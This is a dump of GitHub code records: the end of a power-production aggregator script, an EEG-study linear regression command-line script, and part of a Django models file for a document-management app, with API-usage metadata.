parser.add_argument('--format', required=True, help='output format, json or csv')\n\n args = vars(parser.parse_args())\n \n config = None\n with open(CONFIG_PATH, \"r\") as f:\n config = safe_load(f)\n \n check_params(args)\n check_config(config)\n\n start_date = args['from']\n end_date = args['to']\n output_format = args['format']\n\n # Retrieve productions from API\n raw_productions = get_productions(config['url'], config['power_plants'], start_date, end_date)\n \n # Fill missing data in productions\n productions = clean_raw_productions(raw_productions)\n \n # Synchronize production to 900s dt\n synchronized_productions = synchronize_productions(productions)\n\n # Check that synchronized productions can be aggregated (start timestamps must match)\n check_synchronized_productions(synchronized_productions)\n\n # Check that synchronized productions can be aggregated (start timestamps must match)\n aggregated_productions = aggregate_productions(synchronized_productions)\n\n export(aggregated_productions, output_format)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "walari/power_aggregator", "sub_path": "docl.power_aggregator/docl/power_aggregator/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2075, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.basicConfig", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 21, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 22, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 26, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 35, "usage_type": "call"}, {"api_name": "docl.power_aggregator.utils.check.check_params", "line_number": 37, "usage_type": "call"}, {"api_name": "docl.power_aggregator.utils.check.check_config", "line_number": 38, "usage_type": "call"}, {"api_name": "docl.power_aggregator.retriever.get_productions", "line_number": 45, "usage_type": "call"}, {"api_name": "docl.power_aggregator.cleaner.clean_raw_productions", "line_number": 48, "usage_type": "call"}, {"api_name": "docl.power_aggregator.aggregator.synchronize_productions", "line_number": 51, "usage_type": "call"}, {"api_name": "docl.power_aggregator.aggregator.check_synchronized_productions", "line_number": 54, "usage_type": "call"}, {"api_name": "docl.power_aggregator.aggregator.aggregate_productions", "line_number": 57, "usage_type": "call"}, {"api_name": "docl.power_aggregator.exporter.export", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "34861242909", "text": "import sys\nsys.path.append('..')\nfrom src import ML\nfrom src import config\nfrom src.Standard import SpectralAverage\nimport os\nfrom tqdm import tqdm\nimport argparse\nfrom datetime import datetime\n\n\ndef main():\n\n parser = argparse.ArgumentParser(\n description=\"Options for Linear Regression \"\n + \"method of ML.Classifier\")\n\n parser.add_argument('data_type',\n type=str,\n help=\"Input data type: contigs, erps, or spectra\")\n\n parser.add_argument('--studies_folder',\n dest='studies_folder',\n type=str,\n default=config.my_studies,\n help=\"(Default: \" + config.my_studies + \") Path to \"\n + \"parent folder containing study folders\")\n\n parser.add_argument('--study_names',\n dest='study_names',\n nargs='+',\n default=config.study_directory,\n help=\"(Default: \" + config.study_directory + \") \"\n + \"Study folder containing dataset\")\n\n parser.add_argument('--balance',\n dest='balance',\n type=bool,\n default=False,\n help=\"(Default: False) If True, then will pop data \"\n + \"from the larger class datasets until balanced.\")\n\n parser.add_argument('--task',\n dest='task',\n type=str,\n default='P300',\n help=\"(Default: P300) Four-character task name. \"\n + \"Options: \" + str([key for key in config.tasks]))\n\n parser.add_argument('--length',\n dest='length',\n type=int,\n default=250,\n help=\"(Default: 250) Duration of input data, in \"\n + \"number of samples @ \"\n + str(config.sample_rate) + \" Hz\")\n\n parser.add_argument('--channels',\n dest='channels',\n type=str,\n default='1111111111111111111',\n help=\"(Default: 1111111111111111111) Binary string \"\n + \"specifying which of the \"\n + \"following EEG channels will be included \"\n + \"in analysis: \" + str(config.channel_names))\n\n parser.add_argument('--artifact',\n dest='artifact',\n type=str,\n default=''.join(map(str, config.custom_art_map)),\n help=\"(Default: (custom) \"\n + ''.join(map(str, config.custom_art_map))\n + \") Strictness of artifacting \"\n + \"algorithm to be used: 0=strict, 1=some, 2=raw\")\n\n parser.add_argument('--erp_degree',\n dest='erp_degree',\n type=int,\n default=None,\n help=\"(Default: None) If not None, lowest number in \"\n + \".evt files which will be accepted as an erp event. \"\n + \"Only contigs falling immediately after erp event, \"\n + \"i.e. evoked responses, are handled.\")\n\n parser.add_argument('--filter_band',\n dest='filter_band',\n type=str,\n default='nofilter',\n help=\"(Default: nofilter) Bandfilter to be used in \"\n + \"analysis steps, such \"\n + \"as: 'noalpha', 'delta', or 'nofilter'\")\n\n # ============== CNN args ==============\n\n parser.add_argument('--normalize',\n dest='normalize',\n type=str,\n default=None,\n help=\"(Default: None) Which normalization technique \"\n + \"to use. One of \"\n + \"the following: standard, minmax, None\")\n\n parser.add_argument('--sample_weight',\n dest='sample_weight',\n type=bool,\n default=False,\n help=\"(Default: None) If 'auto', uses auto sample \"\n + \"weighting to try to resolve class imbalances\")\n\n parser.add_argument('--plot_data',\n dest='plot_data',\n type=bool,\n default=False,\n help=\"(Default: False) If True, plots coefficients \"\n + \"of linear regression model.\")\n\n parser.add_argument('--plot_ROC',\n dest='plot_ROC',\n type=bool,\n default=False,\n help=\"(Default: False) Plot sensitivity-specificity \"\n + \"curve on validation dataset\")\n\n parser.add_argument('--plot_conf',\n dest='plot_conf',\n type=bool,\n default=False,\n help=\"(Default: False) Plot confusion matrix \"\n + \"on validation dataset\")\n\n parser.add_argument('--plot_spectra',\n dest='plot_spectra',\n type=bool,\n default=False,\n help=\"(Default: False) Plot spectra by group for \"\n + \"training data\")\n\n parser.add_argument('--tt_split',\n dest='tt_split',\n type=float,\n default=0.33,\n help=\"(Default: 0.33) Ratio of test samples \"\n + \"to train samples. Note: not applicable if using \"\n + \"k_folds.\")\n\n parser.add_argument('--k_folds',\n dest='k_folds',\n type=int,\n default=1,\n help=\"(Default: 1) If you want to perform \"\n + \"cross evaluation, set equal to number of k-folds.\")\n\n parser.add_argument('--repetitions',\n dest='repetitions',\n type=int,\n default=1,\n help=\"(Default: 1) Unlike k-fold, trains the \"\n + \"model n times without mixing around subjects. \"\n + \"Can still be used within each k-fold.\")\n\n parser.add_argument('--regularizer',\n dest='regularizer',\n type=str,\n default=None,\n help=\"(Default: l1_l2) Regularizer to be used in dense \"\n + \"layers. One of: ['l1', 'l2', 'l1_l2']\")\n\n parser.add_argument('--regularizer_param',\n dest='regularizer_param',\n type=float,\n default=0.01,\n help=\"(Default: 0.01) Regularization parameter \")\n\n # save the variables in 'args'\n args = parser.parse_args()\n\n data_type = args.data_type\n studies_folder = args.studies_folder\n study_names = args.study_names\n task = args.task\n length = args.length\n channels = args.channels\n artifact = args.artifact\n erp_degree = args.erp_degree\n filter_band = args.filter_band\n normalize = args.normalize\n sample_weight = args.sample_weight\n plot_data = args.plot_data\n plot_ROC = args.plot_ROC\n plot_conf = args.plot_conf\n plot_spectra = args.plot_spectra\n tt_split = args.tt_split\n k_folds = args.k_folds\n repetitions = args.repetitions\n regularizer = args.regularizer\n regularizer_param = args.regularizer_param\n balance = args.balance\n\n # ERROR HANDLING\n if data_type not in [\"erps\", \"spectra\", \"contigs\"]:\n print(\n \"Invalid entry for data_type. \"\n + \"Must be one of ['erps', 'contigs', 'spectra']\")\n raise ValueError\n sys.exit(3)\n\n if not os.path.isdir(studies_folder):\n print(\n \"Invalid entry for studies_folder, \"\n + \"path does not exist as directory.\")\n raise FileNotFoundError\n sys.exit(3)\n\n for study_name in study_names:\n if not os.path.isdir(os.path.join(studies_folder, study_name)):\n print(\n \"Invalid entry for study_name, \"\n + \"path does not exist as directory.\")\n raise FileNotFoundError\n sys.exit(3)\n\n if task not in config.tasks:\n print(\n \"Invalid entry for task, \"\n + \"not accepted as regular task name in config.\")\n raise ValueError\n sys.exit(3)\n\n if type(length) is int is False:\n print(\"Length must be an integer (in Hz).\")\n raise ValueError\n sys.exit(3)\n\n try:\n if (length <= 0) or (length > 10000):\n print(\"Invalid entry for length, must be between 0 and 10000.\")\n raise ValueError\n sys.exit(3)\n except TypeError:\n print(\n \"Invalid entry for length, \"\n + \"must be integer value between 0 and 10000.\")\n raise ValueError\n sys.exit(3)\n\n try:\n str(channels)\n except ValueError:\n print(\n \"Invalid entry for channels. Must be 19-char long string of \"\n + \"1s and 0s\")\n raise ValueError\n sys.exit(3)\n\n if len(channels) != 19:\n print(\n \"Invalid entry for channels. Must be 19-char long string of \"\n + \"1s and 0s\")\n raise ValueError\n sys.exit(3)\n\n for char in channels:\n if char != '0' and char != '1':\n print(\n \"Invalid entry for channels. Must be 19-char long string of \"\n + \"1s and 0s\")\n raise ValueError\n sys.exit(3)\n\n if normalize not in [\"standard\", \"minmax\", None]:\n print(\n \"Invalid entry for normalize. \"\n + \"Must be one of ['standard', 'minmax', 'None'].\")\n raise ValueError\n sys.exit(3)\n\n if tt_split < 0 or tt_split > 0.999:\n print(\n \"Invalid entry for tt_split. Must be float between \"\n + \"0 and 0.999.\")\n raise ValueError\n sys.exit(3)\n\n try:\n if len(str(artifact)) == 19:\n for char in artifact:\n if int(char) < 0 or int(char) > 2:\n raise ValueError\n\n elif artifact in [\"0\", \"1\", \"2\"]:\n artifact = int(artifact)\n\n else:\n raise ValueError\n\n except ValueError:\n print(\n \"Invalid entry for artifact. Must be str with length 19, \"\n + \"or int between 0 and 2.\")\n raise ValueError\n sys.exit(3)\n\n if erp_degree not in [1, 2, None]:\n print(\"Invalid entry for erp_degree. Must be None, 1, or 2.\")\n raise ValueError\n sys.exit(3)\n\n if k_folds <= 0:\n print(\"Invalid entry for k_folds. Must be int 1 or greater.\")\n raise ValueError\n sys.exit(3)\n\n if regularizer is not None:\n if regularizer not in ['l1', 'l2', 'l1_l2']:\n print(\"Invalid entry for regularizer. Must be l1, l2, or l1_l2.\")\n raise ValueError\n sys.exit(3)\n\n if (regularizer_param <= 0) or (regularizer_param >= 1):\n print(\n \"Invalid entry for regularizer param. Must be float between \"\n + \"0 and 1.\")\n raise ValueError\n sys.exit(3)\n\n if filter_band == \"nofilter\":\n pass\n elif any(band == filter_band for band in config.frequency_bands):\n pass\n elif any(\"no\"+band == filter_band for band in config.frequency_bands):\n pass\n elif any(\"lo\"+band == filter_band for band in config.frequency_bands):\n pass\n elif any(\"hi\"+band == filter_band for band in config.frequency_bands):\n pass\n else:\n print(\"That is not a valid filterband option.\")\n raise ValueError\n sys.exit(3)\n\n patient_paths = []\n # patient_path points to our 'condition-positive' dataset\n # ex. patient_path =\n # \"/wavi/EEGstudies/CANlab/spectra/P300_250_1111111111111111111_0_1\"\n for study_name in study_names:\n\n patient_path = studies_folder\\\n + '/'\\\n + study_name\\\n + '/'\\\n + data_type\\\n + '/'\\\n + task\\\n + '_'\\\n + str(length)\\\n + '_'\\\n + channels\\\n + '_'\\\n + str(artifact)\n\n if erp_degree is not None:\n patient_path += (\"_\" + str(erp_degree))\n\n if not os.path.isdir(patient_path):\n print(\"Configuration supplied was not found in study folder data.\")\n print(\"Failed:\", patient_path)\n raise FileNotFoundError\n sys.exit(3)\n\n patient_paths.append(patient_path)\n\n # Instantiate a 'Classifier' Object\n myclf = ML.Classifier(data_type)\n\n # ============== Load All Studies' Data ==============\n patient_paths = []\n # patient_path points to our 'condition-positive' dataset\n # ex. patient_path =\n # \"/wavi/EEGstudies/CANlab/spectra/P300_250_1111111111111111111_0_1\"\n for study_name in study_names:\n\n patient_path = studies_folder\\\n + '/'\\\n + study_name\\\n + '/'\\\n + data_type\\\n + '/'\\\n + task\\\n + '_'\\\n + str(length)\\\n + '_'\\\n + channels\\\n + '_'\\\n + str(artifact)\n\n if erp_degree is not None:\n patient_path += (\"_\" + str(erp_degree))\n\n if not os.path.isdir(patient_path):\n print(\"Configuration supplied was not found in study folder data.\")\n print(\"Failed:\", patient_path)\n raise FileNotFoundError\n sys.exit(3)\n\n patient_paths.append(patient_path)\n\n for patient_path in patient_paths:\n for fname in sorted(os.listdir(patient_path)):\n if \"_\"+filter_band in fname:\n myclf.LoadData(patient_path+\"/\"+fname)\n\n # ============== Balance Class Data Sizes ==============\n # pops data off from the larger class until class sizes are equal\n # found in the reference folders\n if balance is True:\n myclf.Balance()\n\n if k_folds == 1:\n myclf.Prepare(tt_split=tt_split, normalize=normalize)\n\n for i in range(repetitions):\n\n model, y_pred, y_labels = myclf.LinearRegression(\n plot_data=plot_data,\n plot_ROC=plot_ROC,\n plot_conf=plot_conf)\n\n if data_type == 'spectra':\n if plot_spectra is True:\n specavgObj = SpectralAverage(myclf)\n specavgObj.plot(\n fig_fname=myclf.checkpoint_dir\n + \"/specavg_\"\n + os.path.basename(myclf.trial_name)\n + \"_train_\"\n + str(datetime.now().strftime(\"%H-%M-%S\")))\n\n if k_folds > 1:\n myclf.KfoldCrossVal(\n myclf.LDA,\n normalize=normalize,\n regularizer=regularizer,\n regularizer_param=regularizer_param,\n repetitions=repetitions,\n learning_rate=learning_rate,\n lr_decay=lr_decay,\n plot_ROC=plot_ROC,\n plot_conf=plot_conf,\n plot_3d_preds=plot_3d_preds,\n k=k_folds,\n plot_spec_avgs=plot_spectra,\n sample_weight=sample_weight)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "canlab/WAViMedEEG", "sub_path": "scripts/Run_linearregression.py", "file_name": "Run_linearregression.py", "file_ext": "py", "file_size_in_byte": 15711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "src.config.my_studies", "line_number": 25, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 25, "usage_type": "name"}, {"api_name": "src.config.my_studies", "line_number": 26, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 26, "usage_type": "name"}, {"api_name": "src.config.study_directory", "line_number": 32, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 32, "usage_type": "name"}, {"api_name": "src.config.study_directory", "line_number": 33, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 33, "usage_type": "name"}, {"api_name": "src.config.tasks", "line_number": 48, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 48, "usage_type": "name"}, {"api_name": "src.config.sample_rate", "line_number": 56, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 56, "usage_type": "name"}, {"api_name": "src.config.channel_names", "line_number": 65, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 65, "usage_type": "name"}, {"api_name": "src.config.custom_art_map", "line_number": 70, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 70, "usage_type": "name"}, {"api_name": "src.config.custom_art_map", "line_number": 72, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 72, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path", "line_number": 207, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 215, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 220, "usage_type": "call"}, {"api_name": "src.config.tasks", "line_number": 222, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 222, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 227, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 232, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 238, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 244, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 253, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 260, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 268, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 275, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 282, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 301, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 306, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 311, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 317, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 324, "usage_type": "call"}, {"api_name": "src.config.frequency_bands", "line_number": 328, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 328, "usage_type": "name"}, {"api_name": "src.config.frequency_bands", "line_number": 330, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 330, "usage_type": "name"}, {"api_name": "src.config.frequency_bands", "line_number": 332, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 332, "usage_type": "name"}, {"api_name": "src.config.frequency_bands", "line_number": 334, "usage_type": "attribute"}, {"api_name": "src.config", "line_number": 334, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 364, "usage_type": "call"}, {"api_name": "os.path", "line_number": 364, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 368, "usage_type": "call"}, {"api_name": "src.ML.Classifier", "line_number": 373, "usage_type": "call"}, {"api_name": "src.ML", "line_number": 373, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 399, "usage_type": "call"}, {"api_name": "os.path", "line_number": 399, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 403, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 408, "usage_type": "call"}, {"api_name": "src.Standard.SpectralAverage", "line_number": 430, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 434, "usage_type": "call"}, {"api_name": "os.path", "line_number": 434, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 436, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 436, "usage_type": "name"}]} +{"seq_id": "35906864682", "text": "# coding=utf-8\n\nimport logging\nimport os\nimport re\nimport uuid\nfrom collections import OrderedDict\n\nimport dateutil.parser\nfrom django.conf import settings\nfrom django.db import models\nfrom django.template.defaultfilters import slugify\nfrom django.utils import timezone\nfrom django.utils.text import slugify\nfrom fuzzywuzzy import fuzz\n\nfrom .managers import LogManager\n\ntry:\n from django.core.urlresolvers import reverse\nexcept ImportError:\n from django.urls import reverse\n\n\nclass MatchingModel(models.Model):\n\n MATCH_ANY = 1\n MATCH_ALL = 2\n MATCH_LITERAL = 3\n MATCH_REGEX = 4\n MATCH_FUZZY = 5\n MATCHING_ALGORITHMS = (\n (MATCH_ANY, \"Any\"),\n (MATCH_ALL, \"All\"),\n (MATCH_LITERAL, \"Literal\"),\n (MATCH_REGEX, \"Regular Expression\"),\n (MATCH_FUZZY, \"Fuzzy Match\"),\n )\n\n name = models.CharField(max_length=128, unique=True)\n slug = models.SlugField(blank=True, editable=False)\n\n match = models.CharField(max_length=256, blank=True)\n matching_algorithm = models.PositiveIntegerField(\n choices=MATCHING_ALGORITHMS,\n default=MATCH_ANY,\n help_text=(\n \"Which algorithm you want to use when matching text to the OCR'd \"\n \"PDF. Here, \\\"any\\\" looks for any occurrence of any word \"\n \"provided in the PDF, while \\\"all\\\" requires that every word \"\n \"provided appear in the PDF, albeit not in the order provided. A \"\n \"\\\"literal\\\" match means that the text you enter must appear in \"\n \"the PDF exactly as you've entered it, and \\\"regular expression\\\" \"\n \"uses a regex to match the PDF. (If you don't know what a regex \"\n \"is, you probably don't want this option.) Finally, a \\\"fuzzy \"\n \"match\\\" looks for words or phrases that are mostly—but not \"\n \"exactly—the same, which can be useful for matching against \"\n \"documents containg imperfections that foil accurate OCR.\"\n )\n )\n\n is_insensitive = models.BooleanField(default=True)\n\n class Meta:\n abstract = True\n ordering = (\"name\",)\n\n def __str__(self):\n return self.name\n\n @property\n def conditions(self):\n return \"{}: \\\"{}\\\" ({})\".format(\n self.name, self.match, self.get_matching_algorithm_display())\n\n @classmethod\n def match_all(cls, text, tags=None):\n\n if tags is None:\n tags = cls.objects.all()\n\n text = text.lower()\n for tag in tags:\n if tag.matches(text):\n yield tag\n\n def matches(self, text):\n\n search_kwargs = {}\n\n # Check that match is not empty\n if self.match.strip() == \"\":\n return False\n\n if self.is_insensitive:\n search_kwargs = {\"flags\": re.IGNORECASE}\n\n if self.matching_algorithm == self.MATCH_ALL:\n for word in self._split_match():\n search_result = re.search(\n r\"\\b{}\\b\".format(word), text, **search_kwargs)\n if not search_result:\n return False\n return True\n\n if self.matching_algorithm == self.MATCH_ANY:\n for word in self._split_match():\n if re.search(r\"\\b{}\\b\".format(word), text, **search_kwargs):\n return True\n return False\n\n if self.matching_algorithm == self.MATCH_LITERAL:\n return bool(re.search(\n r\"\\b{}\\b\".format(self.match), text, **search_kwargs))\n\n if self.matching_algorithm == self.MATCH_REGEX:\n return bool(re.search(\n re.compile(self.match, **search_kwargs), text))\n\n if self.matching_algorithm == self.MATCH_FUZZY:\n match = re.sub(r'[^\\w\\s]', '', self.match)\n text = re.sub(r'[^\\w\\s]', '', text)\n if self.is_insensitive:\n match = match.lower()\n text = text.lower()\n\n return True if fuzz.partial_ratio(match, text) >= 90 else False\n\n raise NotImplementedError(\"Unsupported matching algorithm\")\n\n def _split_match(self):\n \"\"\"\n Splits the match to individual keywords, getting rid of unnecessary\n spaces and grouping quoted words together.\n\n Example:\n ' some random words \"with quotes \" and spaces'\n ==>\n [\"some\", \"random\", \"words\", \"with+quotes\", \"and\", \"spaces\"]\n \"\"\"\n findterms = re.compile(r'\"([^\"]+)\"|(\\S+)').findall\n normspace = re.compile(r\"\\s+\").sub\n return [\n normspace(\" \", (t[0] or t[1]).strip()).replace(\" \", r\"\\s+\")\n for t in findterms(self.match)\n ]\n\n def save(self, *args, **kwargs):\n\n self.match = self.match.lower()\n self.slug = slugify(self.name)\n\n models.Model.save(self, *args, **kwargs)\n\n\nclass Correspondent(MatchingModel):\n\n # This regex is probably more restrictive than it needs to be, but it's\n # better safe than sorry.\n SAFE_REGEX = re.compile(r\"^[\\w\\- ,.']+$\")\n\n class Meta:\n ordering = (\"name\",)\n\n\nclass Tag(MatchingModel):\n\n COLOURS = (\n (1, \"#a6cee3\"),\n (2, \"#1f78b4\"),\n (3, \"#b2df8a\"),\n (4, \"#33a02c\"),\n (5, \"#fb9a99\"),\n (6, \"#e31a1c\"),\n (7, \"#fdbf6f\"),\n (8, \"#ff7f00\"),\n (9, \"#cab2d6\"),\n (10, \"#6a3d9a\"),\n (11, \"#b15928\"),\n (12, \"#000000\"),\n (13, \"#cccccc\")\n )\n\n colour = models.PositiveIntegerField(choices=COLOURS, default=1)\n\n\nclass Document(models.Model):\n\n TYPE_PDF = \"pdf\"\n TYPE_PNG = \"png\"\n TYPE_JPG = \"jpg\"\n TYPE_GIF = \"gif\"\n TYPE_TIF = \"tiff\"\n TYPE_TXT = \"txt\"\n TYPE_CSV = \"csv\"\n TYPE_MD = \"md\"\n TYPES = (TYPE_PDF, TYPE_PNG, TYPE_JPG, TYPE_GIF, TYPE_TIF,\n TYPE_TXT, TYPE_CSV, TYPE_MD)\n\n STORAGE_TYPE_UNENCRYPTED = \"unencrypted\"\n STORAGE_TYPE_GPG = \"gpg\"\n STORAGE_TYPES = (\n (STORAGE_TYPE_UNENCRYPTED, \"Unencrypted\"),\n (STORAGE_TYPE_GPG, \"Encrypted with GNU Privacy Guard\")\n )\n\n correspondent = models.ForeignKey(\n Correspondent,\n blank=True,\n null=True,\n related_name=\"documents\",\n on_delete=models.SET_NULL\n )\n\n title = models.CharField(max_length=128, blank=True, db_index=True)\n\n content = models.TextField(\n db_index=True,\n blank=True,\n help_text=\"The raw, text-only data of the document. This field is \"\n \"primarily used for searching.\"\n )\n\n file_type = models.CharField(\n max_length=4,\n editable=False,\n choices=tuple([(t, t.upper()) for t in TYPES])\n )\n\n tags = models.ManyToManyField(\n Tag, related_name=\"documents\", blank=True)\n\n checksum = models.CharField(\n max_length=32,\n editable=False,\n unique=True,\n help_text=\"The checksum of the original document (before it was \"\n \"encrypted). We use this to prevent duplicate document \"\n \"imports.\"\n )\n\n created = models.DateTimeField(\n default=timezone.now, db_index=True)\n modified = models.DateTimeField(\n auto_now=True, editable=False, db_index=True)\n\n storage_type = models.CharField(\n max_length=11,\n choices=STORAGE_TYPES,\n default=STORAGE_TYPE_UNENCRYPTED,\n editable=False\n )\n\n added = models.DateTimeField(\n default=timezone.now, editable=False, db_index=True)\n\n class Meta:\n ordering = (\"correspondent\", \"title\")\n\n def __str__(self):\n created = self.created.strftime(\"%Y%m%d%H%M%S\")\n if self.correspondent and self.title:\n return \"{}: {} - {}\".format(\n created, self.correspondent, self.title)\n if self.correspondent or self.title:\n return \"{}: {}\".format(created, self.correspondent or self.title)\n return str(created)\n\n @property\n def source_path(self):\n\n file_name = \"{:07}.{}\".format(self.pk, self.file_type)\n if self.storage_type == self.STORAGE_TYPE_GPG:\n file_name += \".gpg\"\n\n return os.path.join(\n settings.MEDIA_ROOT,\n \"documents\",\n \"originals\",\n file_name\n )\n\n @property\n def source_file(self):\n return open(self.source_path, \"rb\")\n\n @property\n def file_name(self):\n return slugify(str(self)) + \".\" + self.file_type\n\n @property\n def download_url(self):\n return reverse(\"fetch\", kwargs={\"kind\": \"doc\", \"pk\": self.pk})\n\n @property\n def thumbnail_path(self):\n\n file_name = \"{:07}.png\".format(self.pk)\n if self.storage_type == self.STORAGE_TYPE_GPG:\n file_name += \".gpg\"\n\n return os.path.join(\n settings.MEDIA_ROOT,\n \"documents\",\n \"thumbnails\",\n file_name\n )\n\n @property\n def thumbnail_file(self):\n return open(self.thumbnail_path, \"rb\")\n\n @property\n def thumbnail_url(self):\n return reverse(\"fetch\", kwargs={\"kind\": \"thumb\", \"pk\": self.pk})\n\n\nclass Log(models.Model):\n\n LEVELS = (\n (logging.DEBUG, \"Debugging\"),\n (logging.INFO, \"Informational\"),\n (logging.WARNING, \"Warning\"),\n (logging.ERROR, \"Error\"),\n (logging.CRITICAL, \"Critical\"),\n )\n\n group = models.UUIDField(blank=True)\n message = models.TextField()\n level = models.PositiveIntegerField(choices=LEVELS, default=logging.INFO)\n created = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n\n objects = LogManager()\n\n class Meta:\n ordering = (\"-modified\",)\n\n def __str__(self):\n return self.message\n\n def save(self, *args, **kwargs):\n \"\"\"\n To allow for the case where we don't want to group the message, we\n shouldn't force the caller to specify a one-time group value. However,\n allowing group=None means that the manager can't differentiate the\n different un-grouped messages, so instead we set a random one here.\n \"\"\"\n\n if not self.group:\n self.group = uuid.uuid4()\n\n models.Model.save(self, *args, **kwargs)\n\n\nclass FileInfo:\n\n # This epic regex *almost* worked for our needs, so I'm keeping it here for\n # posterity, in the hopes that we might find a way to make it work one day.\n ALMOST_REGEX = re.compile(\n r\"^((?P\\d\\d\\d\\d\\d\\d\\d\\d\\d\\d\\d\\d\\d\\dZ){separator})?\"\n r\"((?P{non_separated_word}+){separator})??\"\n r\"(?P{non_separated_word}+)\"\n r\"({separator}(?P<tags>[a-z,0-9-]+))?\"\n r\"\\.(?P<extension>[a-zA-Z.-]+)$\".format(\n separator=r\"\\s+-\\s+\",\n non_separated_word=r\"([\\w,. ]|([^\\s]-))\"\n )\n )\n\n formats = \"pdf|jpe?g|png|gif|tiff?|te?xt|md|csv\"\n REGEXES = OrderedDict([\n (\"created-correspondent-title-tags\", re.compile(\n r\"^(?P<created>\\d\\d\\d\\d\\d\\d\\d\\d(\\d\\d\\d\\d\\d\\d)?Z) - \"\n r\"(?P<correspondent>.*) - \"\n r\"(?P<title>.*) - \"\n r\"(?P<tags>[a-z0-9\\-,]*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"created-title-tags\", re.compile(\n r\"^(?P<created>\\d\\d\\d\\d\\d\\d\\d\\d(\\d\\d\\d\\d\\d\\d)?Z) - \"\n r\"(?P<title>.*) - \"\n r\"(?P<tags>[a-z0-9\\-,]*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"created-correspondent-title\", re.compile(\n r\"^(?P<created>\\d\\d\\d\\d\\d\\d\\d\\d(\\d\\d\\d\\d\\d\\d)?Z) - \"\n r\"(?P<correspondent>.*) - \"\n r\"(?P<title>.*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"created-title\", re.compile(\n r\"^(?P<created>\\d\\d\\d\\d\\d\\d\\d\\d(\\d\\d\\d\\d\\d\\d)?Z) - \"\n r\"(?P<title>.*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"correspondent-title-tags\", re.compile(\n r\"(?P<correspondent>.*) - \"\n r\"(?P<title>.*) - \"\n r\"(?P<tags>[a-z0-9\\-,]*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"correspondent-title\", re.compile(\n r\"(?P<correspondent>.*) - \"\n r\"(?P<title>.*)?\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n )),\n (\"title\", re.compile(\n r\"(?P<title>.*)\"\n r\"\\.(?P<extension>{})$\".format(formats),\n flags=re.IGNORECASE\n ))\n ])\n\n def __init__(self, created=None, correspondent=None, title=None, tags=(),\n extension=None):\n\n self.created = created\n self.title = title\n self.extension = extension\n self.correspondent = correspondent\n self.tags = tags\n\n @classmethod\n def _get_created(cls, created):\n try:\n return dateutil.parser.parse(\"{:0<14}Z\".format(created[:-1]))\n except ValueError:\n return None\n\n @classmethod\n def _get_correspondent(cls, name):\n if not name:\n return None\n return Correspondent.objects.get_or_create(name=name, defaults={\n \"slug\": slugify(name)\n })[0]\n\n @classmethod\n def _get_title(cls, title):\n return title\n\n @classmethod\n def 